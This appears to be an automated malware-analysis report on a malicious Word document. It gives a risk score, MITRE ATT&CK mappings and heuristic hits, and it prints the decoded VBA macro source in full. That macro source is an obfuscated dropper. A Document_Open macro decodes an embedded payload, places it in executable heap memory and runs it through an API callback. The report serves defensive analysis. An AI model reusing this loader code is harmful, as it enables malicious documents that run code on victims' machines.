MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with a critical heuristic firing for a dropper agent. The presence of VBA macros, specifically a Document_Open macro, indicates an attempt to automatically execute code upon opening. The VBA script itself appears to be obfuscated but contains elements suggesting it is designed to download and execute a second-stage payload, a common dropper behavior.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6421647-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6421647-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim escapist As Byte -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12566 bytes |
SHA-256: 3c24f99b406cdfc02b109689c0032b12329b60b80c46fa60c9bf1f73552445a4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim fullhanded
Dim inspissate
Dim undernsong
Dim soupstrainer
Sub PrintForCall()
Dim aDoc As ThisDocument
For Each aDoc In Documents
aDoc.Activate
Next
End Sub
Function cimicidae(sugarplum, repellant)
Dim competitively As Variant
Dim handbarrow As Variant
inspissate = inspissate - 96
Dim frustrating As Integer
Dim sledder As Long
Dim corruption As Byte
Dim antimagnetic As String
Dim neckband As Long
ingredient sledder, ByVal VarPtr(repellant) + 8, 4
undernsong = undernsong / 388
neckband = sugarplum
For dulia = 15 To 66
bioclimatology = 66
fullhanded = soupstrainer
froelichia = "myo" & LCase$("glObin")
froelichia = LCase$("aP") & "hid"
Next dulia
ingredient ByVal neckband, ByVal sledder, 3299
soupstrainer = "costerman"
End Function
Sub podiatrist()
Dim fortuitous As Byte
Dim xanthomonad As Long
unrip = producing.byelaw.ControlTipText
reversibility = agglutination.anounce(unrip)
For aleut = 22 To 73
extravagance = 73
fullhanded = fullhanded
adenovirus = LCase$("SC") & LCase$("Up")
adenovirus = UCase$("RE") & UCase$("FUsE")
Next aleut
penthesilean = "perisher"
bites = "priestess"
#If Win64 Then
Dim patagonia As Variant
Dim diener As chaotically
Dim somatism As LongPtr
diener.header = 0
Dim pomade As Long
#Else
Dim oahu As String
diener = 0
Dim saimiri As Byte
Dim somatism As Long
#End If
haunt = 0
usherette = "bal"
alnashar = 4096
candleholder = 60
numerate = 75
If candleholder + numerate < 0 Then
candleholder = Left("unprcapital", 4) & UCase$("oNOuNcE") & UCase$("AbLe")
fullhanded = fullhanded
deft = Right$("valorousab", 2) & Left("iesdilatation", 3)
Else
inspissate = inspissate * 4
numerate = 38
End If
pertinacious = 79 - 13 + 94 + 261984
lathi = suffice(pertinacious, diener, diener)
somatism = istic(lathi, 0, 3299)
pelican = Mid("blockburjungian", 6, 3) & "gomas" & "ter"
Dim correctable As String
horometry = "concessionaire"
pagan = Mid("apatiteancquo", 8, 3) & UCase$("hORag") & Right$("nudgee", 1)
correctable = ravishing
influx = 55
chrysolite = 54
If influx + chrysolite < 36 Then
influx = Right$("attarcr", 2) & LCase$("IsTO") & Right$("bloodguiltybalite", 6)
soupstrainer = soupstrainer
impenitent = LCase$("Bl") & Left("indsamedeboue", 4)
Else
soupstrainer = "adynamic"
chrysolite = 2
End If
macrocosmic = reversibility
frost = "leontocebus"
cimicidae somatism, macrocosmic
sanctification = LCase$("CHE") & Left("eseboscience", 5) & LCase$("ARd")
#If Win64 Then
Dim catechize As String
conservancy = "compromise"
agglutinate = "ruddle"
exciseman = "cruse"
teachership = 105 + 471
#ElseIf (Win32) Then
teachership = 81 - 108 - 96 + 629 + 1698
#End If
Dim troupe As Long
Dim barry As Variant
Dim boise As Long
boise = 0
Dim flowmeter As Long
flowmeter = somatism + teachership
plucky = siren(flowmeter, boise, correctable)
For et = 33 To 71
avouch = 71
inspissate = undernsong + 481
hazards = LCase$("fe") & Left("ndrecohabitation", 4)
hazards = Left("cadecession", 2) & Mid("struthionidaeffeinealligation", 14, 6)
Next et
End Sub
Function ravishing()
Dim boutonniere As String
Dim herborist As Variant
For charades = 17 To 51
unhelpfully = 51
soupstrainer = soupstrainer
morphologically = Right$("gomphotheriidaemu", 2) & UCase$("mBLi") & Left("ngsexlimited", 2)
morphologically = Right$("lombardba", 2) & Mid("bawlckwacult", 5, 4) & Left("terenrich", 3)
Next charades
contending = ThisDocument.Path
ravishing = contending & "/" & ThisDocument.Name
End Function
Private Sub Document_Open()
Dim escapist As Byte
Dim polarimeter As Long
experimentist = LCase$("eq") & Mid("virginityuiprice", 10, 3)
mandrill = "gregorian"
podiatrist
For kites = 12 To 51
groggy = 51
soupstrainer = soupstrainer
fatherinlaw = LCase$("pe") & Mid("israelilagicmonoculous", 8, 5)
fatherinlaw = LCase$("SU") & Mid("bedouincklingcoherence", 8, 6)
Next kites
End Sub
Attribute VB_Name = "agglutination"
'The stress in life
'Life is gone
#If Win64 Then
'Let it all go and in time you will find
'Can't you see
Public Type chaotically
'I can't escape
'I'm not okay
header As LongPtr
'Life is gone
'The pressure seems to get me down
End Type
'Life is gone
'I can't escape
Public Declare PtrSafe Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'The pressure seems to get me down
'Numb me 'til I won't feel pain again
Public Declare PtrSafe Function cacus Lib "user32" Alias "GetDC" (ByVal conversationalist As LongPtr) As LongPtr
'I can't deal with your lies
'Poisons me with time
Public Declare PtrSafe Function arariba Lib "kernel32" Alias "RemoveDirectoryA" (acanthocephala As LongPtr)
'I am no one
'The pressure seems to get me down
Public Declare PtrSafe Function brachiopod Lib "user32" Alias "EndDialog" (ByVal city As LongPtr,nResult As LongPtr) As LongPtr
'I wish I could watch you drown and die
'They have said
Public Declare PtrSafe Function subvert Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'I don't fit in
'I wish I could watch you drown and die
Public Declare PtrSafe Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (affronterai As Any, punchinello As Any, ByVal gurgel As LongPtr)
'I can't escape
'I am no one
Public Declare PtrSafe Function anomalousness Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'Poisons me with time
'I lost my mind
Public Declare PtrSafe Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal oropharynx As LongPtr, ByVal ameboid As LongPtr, ByVal fences As LongPtr) As LongPtr
'Can't you see
'Let it all go and in time you will find
Public Declare PtrSafe Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal rattle As LongPtr,card As chaotically, magnetosphere As chaotically) As LongPtr
'I am no one
'Life has always been a problem
'And take my time
'Life is gone
#Else
'It's like a needle in my spine
'I am no one
Public Declare Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal overcompensation As Long, ByVal backroom As Long, ByVal angelus As Long) As Long
'It stings inside
'Let it all go and in time you will find
Public Declare Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal atonement As Any, lParam As Any) As Long
'I don't fit in
'I don't fit in
Public Declare Function amenra Lib "kernel32" Alias "RemoveDirectoryA" (arminius As Long)
'And take my time
'I don't fit in
Public Declare Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (cooperate As Any, conscience As Any, ByVal jerrybuilder As Long)
'Let it all go and in time you will find
'Nothing is real and dies in the lies
Public Declare Function miscorrect Lib "user32" Alias "GetDC" (footprint As Long) As Long
'They have said
'I am no one
Public Declare Function quadrate Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'Life is gone
'Life is gone
Public Declare Function overwhelming Lib "user32" Alias "EndDialog" (ByVal eccentricity As Long, aviation As Long) As Long
'I wish I could watch you drown and die
'I don't fit in
Public Declare Function fuzzy Lib "kernel32" Alias "TlsAlloc" () As Long
'Life is gone
'Life is gone
Public Declare Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal scarecrow As Long, ByVal retention As Long, ByVal catamount As Long) As Long
'I'm not okay
'I don't fit in
'Life is gone
'And take my time
#End If
'I don't fit in
'And take my time
Function sowbane(affrayment, counselorship)
sowbane = affrayment \ counselorship
End Function
Function halenia(bolete, buxus)
halenia = bolete And buxus
End Function
Function anounce(cockade) As String
Dim charitably As Long
Dim sabreur(255) As Byte
Dim aural(63) As Long
Dim hymenophyllaceae As Long
Dim commutability(63) As Long
Dim supernumernry(63) As Long
inspissate = undernsong And 443
Dim grisette() As Byte
Dim camarade As Integer
Dim gasman As Integer
fullhanded = fullhanded
Dim unsuccessfully As Long
Dim hunkpapa As Long
Dim pigeonhole As Long
Dim ovate() As Byte
Dim orbiculate As String
Dim downstage As Long
luckless = 57 + 4039
weapons = 23 + 56 + 6 + 65195
Dim coxcomical As Long
cricket = 64
blowfish = 124 + 67 + 261953
buglehorn = 100 - 120 + 83
Dim rez As Byte
auld = 103 + 94 + 118 + 257733
michigander = 61 + 117 + 114 + 3740
conspectuity = 125 + 38 + 97 - 5
backwoods = 75 - 71 + 252
Dim pallone As Variant
billboard = 16711680
prosternation = 16515072
arginine = 34 + 57 - 45 + 65490
Dim clavariaceae As Variant
Dim poker() As Byte
ReDim poker(4287)
absorbate = 4288
For i = 1 To absorbate
meow = Mid$(cockade, i, 1)
maidenhead = (Asc(meow))
brood = Right$("countshi", 2) & Right$("cablestri", 4) & Right$("hugonem", 4)
poker(i - 1) = maidenhead
Next
Dim cleaners As Integer
scolion = 3
While scolion < 8
scolion = scolion + 1
undernsong = undernsong + 418
Wend
hierarchically = UBound(poker)
hopsacking = 35
For crackdown = 0 To hierarchically
poker(crackdown) = poker(crackdown) + 2
Next crackdown
For serene = 3 To 57
lombardy = 57
inspissate = inspissate \ 391
sapient = Mid("electriciandetinsanely", 12, 3) & UCase$("RimeNtAl")
sapient = Right$("balkinessjo", 2) & Mid("breechclothnahlycaena", 12, 3)
Next serene
gasman = 0
scholarship = 122
baal = 255
For unsuccessfully = 0 To baal
Select Case unsuccessfully
Case 65 To 90
sabreur(unsuccessfully) = unsuccessfully - 65
Case 97 To scholarship
sabreur(unsuccessfully) = unsuccessfully - 71
Case 48 To 57
sabreur(unsuccessfully) = unsuccessfully + 8 - 127 + 123
Case 43
sabreur(unsuccessfully) = 62
Case 47
sabreur(unsuccessfully) = 63
End Select
Next unsuccessfully
For unsuccessfully = 0 To 63
supernumernry(unsuccessfully) = chasser(unsuccessfully, cricket)
aural(unsuccessfully) = chasser(unsuccessfully, luckless)
commutability(unsuccessfully) = chasser(unsuccessfully, blowfish)
Next unsuccessfully
wishes = 12
While wishes < 15
wishes = wishes + 1
inspissate = inspissate \ 55
Wend
grisette = poker
mongo = 12 - 54 - 76 + 122
ReDim ovate((((UBound(grisette) + 1) \ mongo) * 3) - 1)
For thistly = 41 To 51
sapling = 51
soupstrainer = "alchemic"
roadster = UCase$("De") & "mijo" & "ur"
roadster = "ap" & UCase$("hAKI") & UCase$("a")
Next thistly
wronged = 56 - 42 + 7 - 18
fullhanded = soupstrainer
inspissate = undernsong / 132
begum = wronged + 1
aepyorniformes = 31 - 32 + 3
For hymenophyllaceae = 0 To UBound(grisette) Step begum
coexistence = grisette(hymenophyllaceae)
pigeonhole = commutability(sabreur(coexistence)) _
+ aural(sabreur(grisette(hymenophyllaceae + 1))) + supernumernry(sabreur(grisette(hymenophyllaceae + 2))) + sabreur(grisette(hymenophyllaceae + wronged))
unsuccessfully = halenia(pigeonhole, billboard)
ovate(charitably) = sowbane(unsuccessfully, arginine)
unsuccessfully = halenia(pigeonhole, weapons)
ovate(charitably + 1) = sowbane(unsuccessfully, backwoods)
ovate(charitably + aepyorniformes) = halenia(pigeonhole, conspectuity)
charitably = charitably + aepyorniformes + 1
Next hymenophyllaceae
anounce = ovate
End Function
Function chasser(courageous, acception)
chasser = courageous * acception
End Function
Sub TemplatesDoChange()
Dim CurDoc As Document
Do While strCurDoc <> ""
Set CurDoc = Documents.Open(FName:=strDocPath & strCurDoc)
CurDoc.AttachedTemplate = strTemplateB
CurDoc.Close wdSaveChanges
strCurDoc = Dir
Loop
End Sub
Attribute VB_Name = "producing"
Attribute VB_Base = "0{D49F5CA7-F1C1-4117-A68E-D10E8F1924EC}{A7C12257-AF1F-469E-A10E-A5E77398E32D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "whitish"
Attribute VB_Base = "0{DCB58BD7-81CC-4FEE-8775-9A9A830BD59C}{0A3CA1CA-8CEC-4FD5-B377-2ABB5C8EDFCD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.